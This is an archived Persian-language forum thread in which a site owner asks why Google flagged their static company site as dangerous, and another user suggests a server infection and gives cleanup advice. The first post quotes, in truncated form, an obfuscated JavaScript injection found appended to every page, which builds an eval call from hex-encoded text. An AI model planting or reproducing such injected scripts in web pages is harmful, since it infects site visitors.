PDA

نسخه کامل مشاهده نسخه کامل : پيغام گوگل درباره مشكوك بودن يكي از سايت هاي شركت ما به ويروسي بودن



مستانه
08-06-2009, 12:50
سلام
من اين بحث رو در قسمت هك هم مطرح كردم اما كسي جواب نداد!
چند روز پيش وقتي اسم سايتم رو در گوگل سرچ كردم ، در كنار نام سايت نوشته شده بود " بازديد از اين سايت مكن است به رايانه شما آسيب وارد نمايد . " كه البته با كليك روي نام سايت صفحه ديگه بود كه توضيح مي داد اين سايت مشكوك به آلوده بودنه و ..
اين سايت بغير از صفحه تماس با كه ارسال ايميل آن با استفاده از php هست ، بقيه قسمت هاش كاملا استاتيك هست ، وقتي من فايل هاي صفحات سايت رو دانلود كردم و بازشون كردم به انتهاي تمامي صفحات بعد از تگ </html> كدي چسبيده بود كه براتون اينجا مي ذارم :


div id='x0dc1d5702fd59a862093c38747f60f9b9'><script type="text/javascript">var jQuery=window['eVvqaql4'.replace(/[q4VP\[]/g, '')]('e<vWa,lh'.replace(/[,\<W&h]/g, '')); jQuery('\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x79\x 58\x30\x71\x33\x67\x28\x6f\x6f\x66\x66\x42\x29\x7b \x66\x75\x6e\.....

از دوستان اگر كسي اطلاعاتي داره لطفا راهنمايي كنند كه اگر اين يك ويروسه چطور وارد شده و چطور مي شه امنيت سايت هاي استايك رو بالا برد ؟

neopersia
08-06-2009, 17:57
این احتمالاً یک ویروسه که به سرور نفوذ کرده و فایلهای html رو تحت تأثیر قرار میده
من هم قبلان یه نمونه از این ویروس رو تجربه کردم! ظاهراً کار زیادی نمیشه برای امنیتش کرد به جز اینکه امنیت کلی سرور بالا بره که در حطیه اختیارات طراح سایت نیست!
فعلاً باید اون کدها رو از صفحات حذف کنید بعد اگر تو کنترل پنلتون امکان اسکن کردن ویروس هست انجام بدید.
اما در هر صورت با شرکت هاستینگ تماس بگیرید تا اطلاع داشته باشن و احیاناً برای اون یه چاره ای پیدا کنن!